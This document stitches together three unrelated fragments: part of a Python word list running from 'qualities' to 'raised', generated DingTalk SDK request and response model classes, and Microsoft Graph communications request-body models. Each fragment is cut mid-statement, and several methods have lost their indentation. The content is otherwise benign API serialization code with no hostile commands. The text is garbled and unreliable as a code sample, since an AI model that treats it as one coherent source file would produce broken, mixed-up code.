'qualities',
'quality',
"quality's",
'quantities',
'quantity',
"quantity's",
'quantum',
'quarry',
'quarter',
'quarterdeck',
'quartered',
'quartering',
'quarterly',
'quarters',
'quartet',
'quasimodo',
"quasimodo's",
'quasimodos',
'quater',
'quaterers',
'quebec',
'quebecor',
'queen',
"queen's",
'queenly',
'queens',
'quentin',
"quentin's",
'queried',
'query',
'quesadilla',
'quesadillas',
'quest',
'questant',
'questants',
'quested',
'quester',
"quester's",
'questers',
'questing',
'question',
'questioned',
'questioner',
'questioners',
'questioning',
'questionings',
'questions',
'quests',
'queued',
'queuing',
'quick',
'quick-rot',
'quick-witted',
'quicken',
'quickens',
'quicker',
'quickest',
'quickly',
'quicksilver',
'quidditch',
'quiet',
'quieted',
'quieten',
'quietens',
'quieter',
'quietest',
'quieting',
'quietly',
'quiets',
'quilt',
'quilting',
'quilts',
'quinary',
'quintessential',
'quirtle',
'quit',
'quite',
'quits',
'quitting',
'quixotic',
'quiz',
'quizzed',
'quizzes',
'quizzical',
'quo',
'quote',
'quotes',
'r',
'r/toontown',
'rabbit',
"rabbit's",
'rabbits',
'raccoon',
"raccoon's",
'raccoons',
'race',
'raced',
'racer',
"racer's",
'racers',
'races',
'raceway',
'rachel',
'rachelle',
"racin'",
'racing',
'racket',
'rackets',
'rackham',
'rad',
'radar',
'radiant',
'radiate',
'radiator',
'radiators',
'radical',
'radio',
"radio's",
'radioed',
'radioing',
'radios',
'radishes',
'radius',
'rae',
'raff',
'raft',
"raft's",
'rafting',
'rafts',
'ragetti',
'ragged',
'ragtime',
'raichu',
'raid',
'raided',
'raider',
'raiders',
'raiding',
'raids',
'raikiri',
'rail',
'railing',
'railroad',
'railroaded',
'railroader',
'railroaders',
'railroading',
'railroads',
'rails',
'railstand',
'railwas',
'railway',
"railway's",
'rain',
"rain's",
'rainbow',
'rainbows',
'rained',
'raining',
'rains',
'rainstorms',
'rainy',
'raise',
'raised',
| |
None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetTrustDeviceListResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class ListMiniAppAvailableVersionHeaders(TeaModel):
    """Custom request headers for the ListMiniAppAvailableVersion API."""

    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        # Extra headers sent verbatim with the request.
        self.common_headers = common_headers
        # Value for the x-acs-dingtalk-access-token header.
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token

    def validate(self):
        # No constraints to enforce on header values.
        pass

    def to_map(self):
        """Serialize to a plain dict, honoring any inherited mapping first."""
        inherited = super().to_map()
        if inherited is not None:
            return inherited
        result = {}
        for key, value in (
            ('commonHeaders', self.common_headers),
            ('x-acs-dingtalk-access-token', self.x_acs_dingtalk_access_token),
        ):
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from a plain dict *m* and return self."""
        m = m or {}
        value = m.get('commonHeaders')
        if value is not None:
            self.common_headers = value
        value = m.get('x-acs-dingtalk-access-token')
        if value is not None:
            self.x_acs_dingtalk_access_token = value
        return self
class ListMiniAppAvailableVersionRequest(TeaModel):
    """Request parameters for listing the available versions of a mini app."""

    # (python attribute, wire key) pairs shared by to_map/from_map so the
    # two methods cannot drift apart; order matches serialization order.
    _FIELDS = (
        ('version_type_set', 'versionTypeSet'),
        ('page_size', 'pageSize'),
        ('page_number', 'pageNumber'),
        ('ding_isv_org_id', 'dingIsvOrgId'),
        ('ding_org_id', 'dingOrgId'),
        ('ding_suite_key', 'dingSuiteKey'),
        ('ding_corp_id', 'dingCorpId'),
        ('ding_client_id', 'dingClientId'),
        ('ding_token_grant_type', 'dingTokenGrantType'),
        ('mini_app_id', 'miniAppId'),
    )

    def __init__(
        self,
        version_type_set: List[int] = None,
        page_size: int = None,
        page_number: int = None,
        ding_isv_org_id: int = None,
        ding_org_id: int = None,
        ding_suite_key: str = None,
        ding_corp_id: str = None,
        ding_client_id: str = None,
        ding_token_grant_type: int = None,
        mini_app_id: str = None,
    ):
        # Version types to include: 0 = dev, 1 = gray, 2 = release, 3 = trial.
        self.version_type_set = version_type_set
        # Page size.
        self.page_size = page_size
        # Page number.
        self.page_number = page_number
        self.ding_isv_org_id = ding_isv_org_id
        self.ding_org_id = ding_org_id
        self.ding_suite_key = ding_suite_key
        self.ding_corp_id = ding_corp_id
        self.ding_client_id = ding_client_id
        self.ding_token_grant_type = ding_token_grant_type
        # Mini app id.
        self.mini_app_id = mini_app_id

    def validate(self):
        # No constraints to enforce.
        pass

    def to_map(self):
        """Serialize non-None fields to a plain dict keyed by wire names."""
        inherited = super().to_map()
        if inherited is not None:
            return inherited
        result = {}
        for attr, key in self._FIELDS:
            value = getattr(self, attr)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from a plain dict *m* and return self."""
        m = m or {}
        for attr, key in self._FIELDS:
            if m.get(key) is not None:
                setattr(self, attr, m.get(key))
        return self
class ListMiniAppAvailableVersionResponseBodyList(TeaModel):
    """A single mini-app version entry in the response list."""

    def __init__(
        self,
        build_status: int = None,
        version: str = None,
    ):
        # Build status: 0 = building, 1 = succeeded, 2 = failed.
        self.build_status = build_status
        # Version string.
        self.version = version

    def validate(self):
        # No constraints to enforce.
        pass

    def to_map(self):
        """Serialize non-None fields to a plain dict keyed by wire names."""
        inherited = super().to_map()
        if inherited is not None:
            return inherited
        result = {}
        if self.build_status is not None:
            result['buildStatus'] = self.build_status
        if self.version is not None:
            result['version'] = self.version
        return result

    def from_map(self, m: dict = None):
        """Populate fields from a plain dict *m* and return self."""
        m = m or {}
        status = m.get('buildStatus')
        if status is not None:
            self.build_status = status
        version = m.get('version')
        if version is not None:
            self.version = version
        return self
class ListMiniAppAvailableVersionResponseBody(TeaModel):
    """Response body: the list of available mini-app versions."""

    def __init__(
        self,
        list: List[ListMiniAppAvailableVersionResponseBodyList] = None,
    ):
        # Result entries. (The parameter name `list` mirrors the wire key.)
        self.list = list

    def validate(self):
        # Cascade validation into each non-empty entry.
        if self.list:
            for entry in self.list:
                if entry:
                    entry.validate()

    def to_map(self):
        """Serialize to a plain dict; the 'list' key is always present."""
        inherited = super().to_map()
        if inherited is not None:
            return inherited
        result = {'list': []}
        if self.list is not None:
            for entry in self.list:
                result['list'].append(entry.to_map() if entry else None)
        return result

    def from_map(self, m: dict = None):
        """Populate fields from a plain dict *m* and return self."""
        m = m or {}
        # Reset to an empty list before repopulating.
        self.list = []
        if m.get('list') is not None:
            for item in m.get('list'):
                self.list.append(
                    ListMiniAppAvailableVersionResponseBodyList().from_map(item))
        return self
class ListMiniAppAvailableVersionResponse(TeaModel):
    """Full response wrapper: raw headers plus the parsed body model."""

    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: ListMiniAppAvailableVersionResponseBody = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        # A complete response must carry both headers and a body.
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        """Serialize non-None fields to a plain dict."""
        inherited = super().to_map()
        if inherited is not None:
            return inherited
        result = {}
        if self.headers is not None:
            result['headers'] = self.headers
        if self.body is not None:
            result['body'] = self.body.to_map()
        return result

    def from_map(self, m: dict = None):
        """Populate fields from a plain dict *m* and return self."""
        m = m or {}
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('body') is not None:
            # Deserialize the nested body payload into its model type.
            self.body = ListMiniAppAvailableVersionResponseBody().from_map(m['body'])
        return self
class SearchOrgInnerGroupInfoHeaders(TeaModel):
    """Custom request headers for the SearchOrgInnerGroupInfo API."""

    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        # Extra headers sent verbatim with the request.
        self.common_headers = common_headers
        # Value for the x-acs-dingtalk-access-token header.
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token

    def validate(self):
        # No constraints to enforce on header values.
        pass

    def to_map(self):
        """Serialize to a plain dict, honoring any inherited mapping first."""
        inherited = super().to_map()
        if inherited is not None:
            return inherited
        result = {}
        for key, value in (
            ('commonHeaders', self.common_headers),
            ('x-acs-dingtalk-access-token', self.x_acs_dingtalk_access_token),
        ):
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from a plain dict *m* and return self."""
        m = m or {}
        value = m.get('commonHeaders')
        if value is not None:
            self.common_headers = value
        value = m.get('x-acs-dingtalk-access-token')
        if value is not None:
            self.x_acs_dingtalk_access_token = value
        return self
class SearchOrgInnerGroupInfoRequest(TeaModel):
    """Filter parameters for searching internal org group chats."""

    # (python attribute, wire key) pairs shared by to_map/from_map so the
    # two methods cannot drift apart; order matches serialization order.
    _FIELDS = (
        ('group_members_count_end', 'groupMembersCountEnd'),
        ('sync_to_dingpan', 'syncToDingpan'),
        ('group_owner', 'groupOwner'),
        ('create_time_end', 'createTimeEnd'),
        ('page_size', 'pageSize'),
        ('create_time_start', 'createTimeStart'),
        ('uuid', 'uuid'),
        ('group_members_count_start', 'groupMembersCountStart'),
        ('last_active_time_end', 'lastActiveTimeEnd'),
        ('operator_user_id', 'operatorUserId'),
        ('group_name', 'groupName'),
        ('page_start', 'pageStart'),
        ('last_active_time_start', 'lastActiveTimeStart'),
    )

    def __init__(
        self,
        group_members_count_end: int = None,
        sync_to_dingpan: int = None,
        group_owner: str = None,
        create_time_end: int = None,
        page_size: int = None,
        create_time_start: int = None,
        uuid: str = None,
        group_members_count_start: int = None,
        last_active_time_end: int = None,
        operator_user_id: str = None,
        group_name: str = None,
        page_start: int = None,
        last_active_time_start: int = None,
    ):
        # Each attribute maps 1:1 onto a camelCase wire key; see _FIELDS.
        # Upper/lower bounds on group member count.
        self.group_members_count_end = group_members_count_end
        self.group_members_count_start = group_members_count_start
        # Whether the group syncs to DingPan.
        self.sync_to_dingpan = sync_to_dingpan
        # Group owner filter.
        self.group_owner = group_owner
        # Creation-time window.
        self.create_time_end = create_time_end
        self.create_time_start = create_time_start
        # Pagination controls.
        self.page_size = page_size
        self.page_start = page_start
        self.uuid = uuid
        # Last-active-time window.
        self.last_active_time_end = last_active_time_end
        self.last_active_time_start = last_active_time_start
        # User id of the operator performing the search.
        self.operator_user_id = operator_user_id
        # Group name filter.
        self.group_name = group_name

    def validate(self):
        # No constraints to enforce.
        pass

    def to_map(self):
        """Serialize non-None fields to a plain dict keyed by wire names."""
        inherited = super().to_map()
        if inherited is not None:
            return inherited
        result = {}
        for attr, key in self._FIELDS:
            value = getattr(self, attr)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from a plain dict *m* and return self."""
        m = m or {}
        for attr, key in self._FIELDS:
            if m.get(key) is not None:
                setattr(self, attr, m.get(key))
        return self
class SearchOrgInnerGroupInfoResponseBodyItems(TeaModel):
    def __init__(
        self,
        open_conversation_id: str = None,
        group_owner: str = None,
        group_name: str = None,
        group_admins_count: int = None,
        group_members_count: int = None,
        group_create_time: int = None,
        group_last_active_time: int = None,
        group_last_active_time_show: str = None,
        sync_to_dingpan: int = None,
        used_quota: int = None,
        group_owner_user_id: str = None,
        status: int = None,
        template_id: str = None,
        template_name: str = None,
    ):
        """Build one group-info result item; every field is optional and
        stored verbatim on the instance.

        Times (`group_create_time`, `group_last_active_time`) are ints —
        presumably epoch timestamps, while `group_last_active_time_show` is
        a display string; TODO confirm units against the API docs.
        """
        self.open_conversation_id = open_conversation_id
        self.group_owner = group_owner
        self.group_name = group_name
        self.group_admins_count = group_admins_count
        self.group_members_count = group_members_count
        self.group_create_time = group_create_time
        self.group_last_active_time = group_last_active_time
        self.group_last_active_time_show = group_last_active_time_show
        self.sync_to_dingpan = sync_to_dingpan
        self.used_quota = used_quota
        self.group_owner_user_id = group_owner_user_id
        self.status = status
        self.template_id = template_id
        self.template_name = template_name
    def validate(self):
        # No field constraints are enforced for this model.
        pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.open_conversation_id is not None:
result['openConversationId'] = self.open_conversation_id
if self.group_owner is not None:
result['groupOwner'] = self.group_owner
if self.group_name is not None:
result['groupName'] = self.group_name
| |
kwargs.get('target', None)
self.details = kwargs.get('details', None)
self.innererror = kwargs.get('innererror', None)
class Paths10WpgkzCommunicationsMicrosoftGraphGetpresencesbyuseridPostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
    """Request body schema for POST /communications/getPresencesByUserId.

    :param additional_properties: Unmatched properties from the message are deserialized to this
     collection.
    :type additional_properties: dict[str, object]
    :param ids:
    :type ids: list[str]
    """

    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'ids': {'key': 'ids', 'type': '[str]'},
    }

    def __init__(self, **kwargs):
        # Every field is an optional keyword; missing values default to None.
        super(Paths10WpgkzCommunicationsMicrosoftGraphGetpresencesbyuseridPostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
        self.additional_properties = kwargs.get('additional_properties')
        self.ids = kwargs.get('ids')
class Paths13Zt223CommunicationsCallsCallIdMicrosoftGraphMutePostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
    """Request body schema for POST /communications/calls/{call-id}/mute.

    :param additional_properties: Unmatched properties from the message are deserialized to this
     collection.
    :type additional_properties: dict[str, object]
    :param client_context:
    :type client_context: str
    """

    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'client_context': {'key': 'clientContext', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        # Every field is an optional keyword; missing values default to None.
        super(Paths13Zt223CommunicationsCallsCallIdMicrosoftGraphMutePostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
        self.additional_properties = kwargs.get('additional_properties')
        self.client_context = kwargs.get('client_context')
class Paths14Wb7KqCommunicationsCallsCallIdMicrosoftGraphRecordresponsePostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
    """Request body schema for POST /communications/calls/{call-id}/recordResponse.

    :param additional_properties: Unmatched properties from the message are deserialized to this
     collection.
    :type additional_properties: dict[str, object]
    :param prompts:
    :type prompts: list[dict[str, object]]
    :param barge_in_allowed:
    :type barge_in_allowed: bool
    :param initial_silence_timeout_in_seconds:
    :type initial_silence_timeout_in_seconds: int
    :param max_silence_timeout_in_seconds:
    :type max_silence_timeout_in_seconds: int
    :param max_record_duration_in_seconds:
    :type max_record_duration_in_seconds: int
    :param play_beep:
    :type play_beep: bool
    :param stream_while_recording:
    :type stream_while_recording: bool
    :param stop_tones:
    :type stop_tones: list[str]
    :param client_context:
    :type client_context: str
    """

    # The three timeout/duration fields are constrained to 32-bit int range.
    _validation = {
        'initial_silence_timeout_in_seconds': {'maximum': 2147483647, 'minimum': -2147483648},
        'max_silence_timeout_in_seconds': {'maximum': 2147483647, 'minimum': -2147483648},
        'max_record_duration_in_seconds': {'maximum': 2147483647, 'minimum': -2147483648},
    }

    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'prompts': {'key': 'prompts', 'type': '[{object}]'},
        'barge_in_allowed': {'key': 'bargeInAllowed', 'type': 'bool'},
        'initial_silence_timeout_in_seconds': {'key': 'initialSilenceTimeoutInSeconds', 'type': 'int'},
        'max_silence_timeout_in_seconds': {'key': 'maxSilenceTimeoutInSeconds', 'type': 'int'},
        'max_record_duration_in_seconds': {'key': 'maxRecordDurationInSeconds', 'type': 'int'},
        'play_beep': {'key': 'playBeep', 'type': 'bool'},
        'stream_while_recording': {'key': 'streamWhileRecording', 'type': 'bool'},
        'stop_tones': {'key': 'stopTones', 'type': '[str]'},
        'client_context': {'key': 'clientContext', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        # Boolean flags default to False; everything else defaults to None.
        super(Paths14Wb7KqCommunicationsCallsCallIdMicrosoftGraphRecordresponsePostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
        self.additional_properties = kwargs.get('additional_properties')
        self.prompts = kwargs.get('prompts')
        self.barge_in_allowed = kwargs.get('barge_in_allowed', False)
        self.initial_silence_timeout_in_seconds = kwargs.get('initial_silence_timeout_in_seconds')
        self.max_silence_timeout_in_seconds = kwargs.get('max_silence_timeout_in_seconds')
        self.max_record_duration_in_seconds = kwargs.get('max_record_duration_in_seconds')
        self.play_beep = kwargs.get('play_beep', False)
        self.stream_while_recording = kwargs.get('stream_while_recording', False)
        self.stop_tones = kwargs.get('stop_tones')
        self.client_context = kwargs.get('client_context')
class Paths183Gi8UCommunicationsCallsCallIdMicrosoftGraphRedirectPostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
    """Request body schema for POST /communications/calls/{call-id}/redirect.

    :param additional_properties: Unmatched properties from the message are deserialized to this
     collection.
    :type additional_properties: dict[str, object]
    :param targets:
    :type targets: list[~cloud_communications.models.MicrosoftGraphInvitationParticipantInfo]
    :param target_disposition: Possible values include: "default", "simultaneousRing", "forward".
    :type target_disposition: str or ~cloud_communications.models.MicrosoftGraphCallDisposition
    :param timeout:
    :type timeout: int
    :param mask_callee:
    :type mask_callee: bool
    :param mask_caller:
    :type mask_caller: bool
    :param callback_uri:
    :type callback_uri: str
    """

    # timeout is constrained to 32-bit int range.
    _validation = {
        'timeout': {'maximum': 2147483647, 'minimum': -2147483648},
    }

    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'targets': {'key': 'targets', 'type': '[MicrosoftGraphInvitationParticipantInfo]'},
        'target_disposition': {'key': 'targetDisposition', 'type': 'str'},
        'timeout': {'key': 'timeout', 'type': 'int'},
        'mask_callee': {'key': 'maskCallee', 'type': 'bool'},
        'mask_caller': {'key': 'maskCaller', 'type': 'bool'},
        'callback_uri': {'key': 'callbackUri', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        # Boolean flags default to False; everything else defaults to None.
        super(Paths183Gi8UCommunicationsCallsCallIdMicrosoftGraphRedirectPostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
        self.additional_properties = kwargs.get('additional_properties')
        self.targets = kwargs.get('targets')
        self.target_disposition = kwargs.get('target_disposition')
        self.timeout = kwargs.get('timeout')
        self.mask_callee = kwargs.get('mask_callee', False)
        self.mask_caller = kwargs.get('mask_caller', False)
        self.callback_uri = kwargs.get('callback_uri')
class Paths1Bh76WaCommunicationsCallsCallIdParticipantsMicrosoftGraphInvitePostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
    """Request body schema for POST /communications/calls/{call-id}/participants/invite.

    :param additional_properties: Unmatched properties from the message are deserialized to this
     collection.
    :type additional_properties: dict[str, object]
    :param participants:
    :type participants: list[~cloud_communications.models.MicrosoftGraphInvitationParticipantInfo]
    :param client_context:
    :type client_context: str
    """

    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'participants': {'key': 'participants', 'type': '[MicrosoftGraphInvitationParticipantInfo]'},
        'client_context': {'key': 'clientContext', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        # Every field is an optional keyword; missing values default to None.
        super(Paths1Bh76WaCommunicationsCallsCallIdParticipantsMicrosoftGraphInvitePostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
        self.additional_properties = kwargs.get('additional_properties')
        self.participants = kwargs.get('participants')
        self.client_context = kwargs.get('client_context')
class Paths1Gzqcv2CommunicationsCallsCallIdMicrosoftGraphPlaypromptPostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
    """Request body schema for POST /communications/calls/{call-id}/playPrompt.

    :param additional_properties: Unmatched properties from the message are deserialized to this
     collection.
    :type additional_properties: dict[str, object]
    :param prompts:
    :type prompts: list[dict[str, object]]
    :param loop:
    :type loop: bool
    :param client_context:
    :type client_context: str
    """

    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'prompts': {'key': 'prompts', 'type': '[{object}]'},
        'loop': {'key': 'loop', 'type': 'bool'},
        'client_context': {'key': 'clientContext', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        # loop defaults to False; everything else defaults to None.
        super(Paths1Gzqcv2CommunicationsCallsCallIdMicrosoftGraphPlaypromptPostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
        self.additional_properties = kwargs.get('additional_properties')
        self.prompts = kwargs.get('prompts')
        self.loop = kwargs.get('loop', False)
        self.client_context = kwargs.get('client_context')
class Paths1JbdsmaCommunicationsCallsMicrosoftGraphLogteleconferencedevicequalityPostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
    """Request body schema for POST /communications/calls/logTeleconferenceDeviceQuality.

    :param additional_properties: Unmatched properties from the message are deserialized to this
     collection.
    :type additional_properties: dict[str, object]
    :param quality: teleconferenceDeviceQuality.
    :type quality: ~cloud_communications.models.MicrosoftGraphTeleconferenceDeviceQuality
    """

    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'quality': {'key': 'quality', 'type': 'MicrosoftGraphTeleconferenceDeviceQuality'},
    }

    def __init__(self, **kwargs):
        # Every field is an optional keyword; missing values default to None.
        super(Paths1JbdsmaCommunicationsCallsMicrosoftGraphLogteleconferencedevicequalityPostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
        self.additional_properties = kwargs.get('additional_properties')
        self.quality = kwargs.get('quality')
class Paths1Mdqe66CommunicationsCallsCallIdMicrosoftGraphRecordPostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
    """Request body schema for POST /communications/calls/{call-id}/record.

    :param additional_properties: Unmatched properties from the message are deserialized to this
     collection.
    :type additional_properties: dict[str, object]
    :param prompts:
    :type prompts: list[dict[str, object]]
    :param barge_in_allowed:
    :type barge_in_allowed: bool
    :param initial_silence_timeout_in_seconds:
    :type initial_silence_timeout_in_seconds: int
    :param max_silence_timeout_in_seconds:
    :type max_silence_timeout_in_seconds: int
    :param max_record_duration_in_seconds:
    :type max_record_duration_in_seconds: int
    :param play_beep:
    :type play_beep: bool
    :param stream_while_recording:
    :type stream_while_recording: bool
    :param stop_tones:
    :type stop_tones: list[str]
    :param client_context:
    :type client_context: str
    """

    # The three timeout/duration fields are constrained to 32-bit int range.
    _validation = {
        'initial_silence_timeout_in_seconds': {'maximum': 2147483647, 'minimum': -2147483648},
        'max_silence_timeout_in_seconds': {'maximum': 2147483647, 'minimum': -2147483648},
        'max_record_duration_in_seconds': {'maximum': 2147483647, 'minimum': -2147483648},
    }

    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'prompts': {'key': 'prompts', 'type': '[{object}]'},
        'barge_in_allowed': {'key': 'bargeInAllowed', 'type': 'bool'},
        'initial_silence_timeout_in_seconds': {'key': 'initialSilenceTimeoutInSeconds', 'type': 'int'},
        'max_silence_timeout_in_seconds': {'key': 'maxSilenceTimeoutInSeconds', 'type': 'int'},
        'max_record_duration_in_seconds': {'key': 'maxRecordDurationInSeconds', 'type': 'int'},
        'play_beep': {'key': 'playBeep', 'type': 'bool'},
        'stream_while_recording': {'key': 'streamWhileRecording', 'type': 'bool'},
        'stop_tones': {'key': 'stopTones', 'type': '[str]'},
        'client_context': {'key': 'clientContext', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        # Boolean flags default to False; everything else defaults to None.
        super(Paths1Mdqe66CommunicationsCallsCallIdMicrosoftGraphRecordPostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
        self.additional_properties = kwargs.get('additional_properties')
        self.prompts = kwargs.get('prompts')
        self.barge_in_allowed = kwargs.get('barge_in_allowed', False)
        self.initial_silence_timeout_in_seconds = kwargs.get('initial_silence_timeout_in_seconds')
        self.max_silence_timeout_in_seconds = kwargs.get('max_silence_timeout_in_seconds')
        self.max_record_duration_in_seconds = kwargs.get('max_record_duration_in_seconds')
        self.play_beep = kwargs.get('play_beep', False)
        self.stream_while_recording = kwargs.get('stream_while_recording', False)
        self.stop_tones = kwargs.get('stop_tones')
        self.client_context = kwargs.get('client_context')
class Paths1Pc6SxrCommunicationsOnlinemeetingsMicrosoftGraphCreateorgetPostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
    """Request body schema for POST /communications/onlineMeetings/createOrGet.

    :param additional_properties: Unmatched properties from the message are deserialized to this
     collection.
    :type additional_properties: dict[str, object]
    :param chat_info: chatInfo.
    :type chat_info: ~cloud_communications.models.MicrosoftGraphChatInfo
    :param end_date_time:
    :type end_date_time: ~datetime.datetime
    :param external_id:
    :type external_id: str
    :param participants: meetingParticipants.
    :type participants: ~cloud_communications.models.MicrosoftGraphMeetingParticipants
    :param start_date_time:
    :type start_date_time: ~datetime.datetime
    :param subject:
    :type subject: str
    """

    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'chat_info': {'key': 'chatInfo', 'type': 'MicrosoftGraphChatInfo'},
        'end_date_time': {'key': 'endDateTime', 'type': 'iso-8601'},
        'external_id': {'key': 'externalId', 'type': 'str'},
        'participants': {'key': 'participants', 'type': 'MicrosoftGraphMeetingParticipants'},
        'start_date_time': {'key': 'startDateTime', 'type': 'iso-8601'},
        'subject': {'key': 'subject', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        # Every field is an optional keyword; missing values default to None.
        super(Paths1Pc6SxrCommunicationsOnlinemeetingsMicrosoftGraphCreateorgetPostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
        self.additional_properties = kwargs.get('additional_properties')
        self.chat_info = kwargs.get('chat_info')
        self.end_date_time = kwargs.get('end_date_time')
        self.external_id = kwargs.get('external_id')
        self.participants = kwargs.get('participants')
        self.start_date_time = kwargs.get('start_date_time')
        self.subject = kwargs.get('subject')
class Paths1X7BvttCommunicationsCallsCallIdMicrosoftGraphUnmutePostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
    """Request body schema for POST /communications/calls/{call-id}/unmute.

    :param additional_properties: Unmatched properties from the message are deserialized to this
     collection.
    :type additional_properties: dict[str, object]
    :param client_context:
    :type client_context: str
    """

    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'client_context': {'key': 'clientContext', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        # Every field is an optional keyword; missing values default to None.
        super(Paths1X7BvttCommunicationsCallsCallIdMicrosoftGraphUnmutePostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
        self.additional_properties = kwargs.get('additional_properties')
        self.client_context = kwargs.get('client_context')
class Paths4QrghdCommunicationsCallsCallIdMicrosoftGraphRejectPostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
    """Request body schema for POST /communications/calls/{call-id}/reject.

    :param additional_properties: Unmatched properties from the message are deserialized to this
     collection.
    :type additional_properties: dict[str, object]
    :param reason: Possible values include: "none", "busy", "forbidden", "unknownFutureValue".
    :type reason: str or ~cloud_communications.models.MicrosoftGraphRejectReason
    :param callback_uri:
    :type callback_uri: str
    """

    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'reason': {'key': 'reason', 'type': 'str'},
        'callback_uri': {'key': 'callbackUri', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        # Every field is an optional keyword; missing values default to None.
        super(Paths4QrghdCommunicationsCallsCallIdMicrosoftGraphRejectPostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
        self.additional_properties = kwargs.get('additional_properties')
        self.reason = kwargs.get('reason')
        self.callback_uri = kwargs.get('callback_uri')
class Paths4Zbm7LCommunicationsCallsCallIdMicrosoftGraphTransferPostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
    """Request body schema for POST /communications/calls/{call-id}/transfer.

    :param additional_properties: Unmatched properties from the message are deserialized to this
     collection.
    :type additional_properties: dict[str, object]
    :param transfer_target: invitationParticipantInfo.
    :type transfer_target: ~cloud_communications.models.MicrosoftGraphInvitationParticipantInfo
    """

    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'transfer_target': {'key': 'transferTarget', 'type': 'MicrosoftGraphInvitationParticipantInfo'},
    }

    def __init__(self, **kwargs):
        # Every field is an optional keyword; missing values default to None.
        super(Paths4Zbm7LCommunicationsCallsCallIdMicrosoftGraphTransferPostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
        self.additional_properties = kwargs.get('additional_properties')
        self.transfer_target = kwargs.get('transfer_target')
class PathsEipedyCommunicationsCallsCallIdMicrosoftGraphUpdaterecordingstatusPostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
    """Request body schema for POST /communications/calls/{call-id}/updateRecordingStatus.

    :param additional_properties: Unmatched properties from the message are deserialized to this
     collection.
    :type additional_properties: dict[str, object]
    :param status: Possible values include: "unknown", "notRecording", "recording", "failed",
     "unknownFutureValue".
    :type status: str or ~cloud_communications.models.MicrosoftGraphRecordingStatus
    :param client_context:
    :type client_context: str
    """

    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'status': {'key': 'status', 'type': 'str'},
        'client_context': {'key': 'clientContext', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        # Every field is an optional keyword; missing values default to None.
        super(PathsEipedyCommunicationsCallsCallIdMicrosoftGraphUpdaterecordingstatusPostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
        self.additional_properties = kwargs.get('additional_properties')
        self.status = kwargs.get('status')
        self.client_context = kwargs.get('client_context')
class PathsKpvac3CommunicationsCallsCallIdParticipantsMicrosoftGraphMuteallPostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
"""PathsKpvac3CommunicationsCallsCallIdParticipantsMicrosoftGraphMuteallPostRequestbodyContentApplicationJsonSchema.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param participants:
:type participants: list[str]
:param client_context:
:type client_context: str
